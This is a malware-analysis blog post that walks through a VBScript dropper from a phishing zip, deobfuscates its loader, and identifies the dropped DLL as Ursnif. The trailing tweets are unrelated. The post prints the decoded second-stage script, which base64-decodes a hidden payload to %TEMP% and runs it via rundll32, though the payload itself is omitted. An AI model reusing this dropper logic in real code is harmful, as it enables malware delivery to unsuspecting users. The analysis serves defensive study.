Here is my first post of a short investigation into a malicious script that I came across.
The sample was posted to the URLhaus.abuse.ch list. This is probably part of a phishing mail that directs you to download the zip file and open it.
When you do this, the VBScript file inside the zip archive will typically be launched and the encoded payload will be executed on the system.
After unzipping we can have a first look at the .vbs script:
' The two numeric arrays referenced below are part of the sample and are omitted here
for tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN = lbound(wGPjfJzXJQxGLsJWnaUekdibWhoIi) to ubound(dVMYfYdJEGreGsr)
    YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf = chr(sqr(wGPjfJzXJQxGLsJWnaUekdibWhoIi(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)) - sqr(dVMYfYdJEGreGsr(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)))
    HoVEFmZZVAZqcifFckqTROBxVyUmGActyC = HoVEFmZZVAZqcifFckqTROBxVyUmGActyC & YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf
next
execute(HoVEFmZZVAZqcifFckqTROBxVyUmGActyC)
A little rewriting, and making it safer by echoing the output instead of executing it, results in the following VBS code:
' ArrayOne and ArrayTwo are the two numeric arrays from the sample (omitted here)
for Value = lbound(ArrayOne) to ubound(ArrayTwo)
    ' each character is the difference of the square roots of the two array entries
    Result = chr(sqr(ArrayOne(Value)) - sqr(ArrayTwo(Value)))
    ConcatResult = ConcatResult & Result
next
' print the decoded second stage instead of passing it to execute()
WScript.Echo ConcatResult
Running this results in the following script:
on error resume next
set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
' drops a harmless-looking Adobe.url shortcut in %TEMP%
Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Adobe.url"
set oUrlLink = WshShell.CreateShortcut(Path)
oUrlLink.TargetPath = "http://adobe.com"
oUrlLink.Save(A)
if (FSO.FileExists(Path)) Then
    WScript.Echo "Error!"
else
    ' object names are kept in variables to hide them from simple string matching
    xml = "Msxml2.DOMDocument"
    ws = "WScript.Shell"
    bin = "bin.base64"
    sa = "shell.application"
    bs = "base64"
    db = "Adodb.Stream"
    Set wshs = createobject(ws)
    Set sh = createobject(sa)
    filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\SHCSdw.dll"
end if
' 'code' holds the reversed base64 payload (omitted here); MSXML does the base64 decoding
Set oXML = CreateObject(xml)
Set oNode = oXML.CreateElement(bs)
oNode.dataType = bin
oNode.text = strreverse(code)
Set BinaryStream = CreateObject(db)
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile filepath
sh.ShellExecute "cmd.exe", "/c everybody shit fuck & runDll32 "& filepath &",DllRegisterServer", "", "open", 0
The script places an Adobe.url in the temp folder pointing to http://
As I already suspected, it does a string reverse on the code variable (strreverse(code)).
Passing this through the base64 decoder results in a PE executable on the filesystem, in your temp folder, with the name SHCSdw.dll.
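Both decoding steps can be reproduced statically, without ever handing the output to execute() or writing the DLL to disk. The script below is an added analysis helper, not code from the original post or from the sample; the arrays and the reversed base64 blob it uses are constructed inline (the real sample's arrays and code variable are much longer and are not on this page).

```python
import base64
import math

# Stage 1: the dropper builds each character as chr(sqr(a) - sqr(b)) over two
# numeric arrays and passes the result to execute(). Decode it offline instead.
def decode_stage1(array_one, array_two):
    if len(array_one) != len(array_two):
        raise ValueError("arrays must have the same length")
    chars = []
    for a, b in zip(array_one, array_two):
        # VBScript Chr() rounds a Double to an integer code point; the sample
        # uses perfect squares, so the difference is exact.
        code = round(math.sqrt(a) - math.sqrt(b))
        if not 0 <= code <= 255:
            raise ValueError("non-byte code point %d" % code)
        chars.append(chr(code))
    return "".join(chars)

# Stage 2: the decoded script reverses the 'code' string, base64-decodes it
# via MSXML and writes the bytes to %TEMP%\SHCSdw.dll before calling rundll32.
def decode_stage2(code):
    return base64.b64decode(code[::-1], validate=True)  # strreverse, then base64

def looks_like_pe(data):
    # A dropped DLL starts with the 'MZ' DOS header magic.
    return data[:2] == b"MZ"

# Constructed sample arrays (not the real ones): encode "WScript.Echo 1" with
# the same chr(sqr(a) - sqr(b)) scheme.
SAMPLE_ARRAY_ONE = [7921, 7396, 10609, 13456, 11664, 13456, 13924,
                    2401, 5329, 10201, 11449, 13225, 1156, 2704]
SAMPLE_ARRAY_TWO = [4, 9, 16, 4, 9, 16, 4, 9, 16, 4, 9, 16, 4, 9]

# Constructed stage-2 blob: a fake 'MZ' stub, base64-encoded and reversed the
# way the sample stores its 'code' variable. Not a real PE file.
FAKE_DLL = b"MZ\x90\x00" + b"constructed stub, not a real DLL"
SAMPLE_CODE = base64.b64encode(FAKE_DLL).decode()[::-1]

if __name__ == "__main__":
    print("stage 1:", decode_stage1(SAMPLE_ARRAY_ONE, SAMPLE_ARRAY_TWO))
    dropped = decode_stage2(SAMPLE_CODE)
    print("stage 2: %d bytes, PE header: %s" % (len(dropped), looks_like_pe(dropped)))
```

On the real sample you would paste the two arrays and the code string from the .vbs into the constants above and hash the returned bytes instead of saving them.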
The dropped file SHCSdw.dll is an Ursnif sample that was compiled at 2020-02-24 09:57:57, if you can believe this data. The sample is available on VirusTotal.
|File|Type|SHA256|
|---|---|---|
|dokument9055.zip|Zip archive data|bde9ee61351d9c61ddf2e7fc382426a5301f1155e1197f2a3d47468db4486d9c|
|SHCSdw.dll|PE32 executable (DLL)|bc8da5ad4010226376c376b2d164cfa4e073a0f6ef7761e9f4864a46a8cb9b32|
Always funny to read a doctored DBG file location c:\big\fat\Usual\mind\Sight\did\said\Untilpiece.pdb from jhgsdiofiosdfisdhfiufsd.bin /cc @JAMESWT_MHT
Great thread and dig through by @fs0c131y: In to the creators of the app used to report results during the #IowaCaucuses - https://
It came recommended in the Darknet Diaries podcast, ep. 54: NotPetya, by Jack Rhysider.
As far as I'm concerned, this is a must-read for anyone working in cybersecurity. It gives so much detail about the Russian government's hacking techniques and motivations.
I already knew most of the separate attacks described in the book, but getting the big picture of how they are all related is an eye-opener.
@AlexKornitzer I'm not a coder by a long shot, but please let me know what you think of this scale I created https://
@James_inthe_box Nice find! The samples have been added to my Zoo. How do you create those histograms?
@Supernaut29A I'm working for an MSP, but reading this I think you need a different MSP. One nuance on the 'Minimum effort for maximum profit' statement: often it is also a case of the customer getting what it pays for. If you take the cheapest MSP, you will probably get the least service.
@cyb3rops I'm shamelessly going to steal both of them for my own future reference. I'm curious about the rest of the presentation.